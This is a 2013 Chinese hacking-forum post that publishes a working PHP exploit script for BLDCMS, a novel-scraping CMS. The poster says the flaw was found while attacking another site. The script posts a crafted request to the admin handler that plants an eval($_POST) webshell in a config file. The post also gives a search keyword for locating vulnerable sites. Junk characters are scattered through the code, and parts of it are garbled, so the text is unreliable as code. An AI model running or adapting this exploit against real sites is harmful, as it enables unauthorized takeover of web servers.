中国网络渗透测试联盟

标题: BLDCMS(白老大小说) Getshell 0day EXP [打印本页]

作者: admin    时间: 2013-3-26 20:49
标题: BLDCMS(白老大小说) Getshell 0day EXP
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞# E1 `: s/ I) n: F$ {
" |$ f, G. P( B# ~/ k! \

/ \% k. T2 V0 ~! \9 a* U5 Z话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 9 x2 Q% e1 q2 W5 D5 H

" F" Q: C( x: B) P; y& ^8 R既然都有人发了 我就把我之前写好的EXP放出来吧5 k0 R' |+ ~  I7 n: p+ `

' X3 r" q" `; q# Z1 [% }* q6 C+ E9 kview source print?01.php;">
7 Y+ S. Q8 m1 ^; o02.<!--?php
0 v9 u* m- U$ H' }) E03.echo "-------------------------------------------------------------------
0 o' d# @' i" l" {/ e04. 0 D2 l5 W  Q( Z' ]: J2 F  [# T
05.------------\r\n              BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP* [: R, P' t6 U( \7 G, H
06.
: K6 O0 G6 {$ O0 u* }! l; U07.(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun3 t. I# o) S" H# t1 i  n# C$ Z
08. + w; E+ k+ o# e5 o  m" i2 A: D& X
09.QQ:981009941\r\n                                2013.3.21\r\n            
! L0 r0 e2 j  j$ F% ~. ?$ _10.
" c- F$ o- V" T) d+ a' M3 \& Y2 O3 a11.
* b) f" y: Q/ X- t5 q/ P# e12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码# J  S6 T4 i! G4 i' {0 j' e, a$ f) [
13. / A3 G8 B+ {) T# Y- |- {4 a
14.)\r\n                    搜索关键字:\"开发者: 白老大小说\"\r\n-----------
3 f6 Q+ L7 |1 c8 n4 O15.
6 h( u9 z+ f$ f+ E; v16.--------------------------------------------------------------------\r\n";$ _# p; e0 G$ `/ l. V
17.$url=$argv[1];) U8 D4 q, {2 D" u4 I
18.$dir=$argv[2];
3 @+ T, \+ Y6 M5 b% ^8 T& N19.$pass=$argv[3];
$ q, R, H5 _9 A" d2 I6 U; s# |20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';" i: T/ U; G) k1 m& ~
21.if (emptyempty($pass)||emptyempty($url))
8 L" D) C3 \: {1 s3 `% ^22.{exit("请输入参数");}: K" w; ]$ t' b7 f! ]8 N
23.else0 f, U7 b' o' ^* f: B3 t
24.{) E% W  b7 |5 v( n+ K2 X
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
8 f- o/ {6 O; ^/ E# R# v26.
* m& A- W4 K% c/ P. ]' S9 y27.al;0 ?$ k; F2 N' f7 @1 w
28.$length = strlen($fuckdata);7 v9 ], }. Z) M+ d' j
29.function getshell($url,$pass)
# ?/ G# P# k' j4 V% g  Q# H$ q30.{( }0 J  ~) e) ^  K& M
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
' T+ W2 F6 o% f3 j$ y: X5 ]' @& Y32.$header = "OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
- A) Q9 U8 t: u33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
3 V2 J% `! ^" n( `) D8 i3 J34.$header .= "User-Agent: MSIE\r\n";' N+ w; [: c# }8 B
35.$header .= "Host:".$url."\r\n";5 Y6 ]+ j1 c) E5 ?  R# q
36.$header .= "Content-Length: ".$length."\r\n";" X9 }$ q  S' e6 s$ D( x( D
37.$header .= "Connection: Close\r\n";
0 o- j& \4 S$ @! Q! a1 P" `38.$header .="\r\n";9 X% N+ B$ o% d4 Q* _
39.$header .= $fuckdata."\r\n\r\n";/ X5 H4 a8 W; g0 z
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
/ o5 M' F$ y! x41.if (!$fp). t7 B$ q" _0 ~0 b) D* V  l1 e( Y
42.{
5 {3 ^3 M! R; M' g7 v" e1 J43.exit ("利用失败:请检查指定目标是否能正常打开");
  ~! b; p2 X- c% K3 o0 U% c  Q44.}( r% w4 d  W- p, P  |' X; G" m
45.else{ if (!fputs($fp,$header))/ v$ M9 t. E3 q* P% J  ?2 v# w4 o
46.{exit ("利用失败");}
4 r. |8 p4 @) E47.else7 a, P4 V6 p7 |! b
48.{4 r$ ~  ~1 L# U3 {0 p
49.$receive = '';- p- [# o" G/ t5 x7 X3 \
50.while (!feof($fp)) {6 J6 E) R: r9 A! |2 P& U/ I
51.$receive .= @fgets($fp, 1000);6 N4 g- F+ N0 H9 Z* Y6 i1 `
52.}4 R. q) n4 Y8 \- L' H. `3 U/ B
53.@fclose($fp);
& W" ?( b5 l7 L54.echo "$url/$dir/conn/config/normal2.php passpass(如连接失败 请检查目标
2 q5 G) \1 ]4 w, t) f$ @& [& }: ]55.
0 |& X- u5 N, \* B56.GPC是否=off)";
. s8 n4 `( j; h. ~* ^& ]2 g- t! W57.}}
- Z4 p8 L* Z1 R0 a58.}/ j5 U/ }% T/ P) G% K$ k
59.}
( `' |" |0 z" d* z8 w60.getshell($url,$pass);
" Q. Z6 K0 P1 k* ^. q61.?-->
3 a& d4 s6 d3 E( q* v7 z0 E
  b2 @& Q; N- G* F& [2 ]. N2 o) G% E
1 n) h: W( X7 w9 V+ a6 ^5 j
by 数据流
3 h5 Y; A$ u2 s; k1 N




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2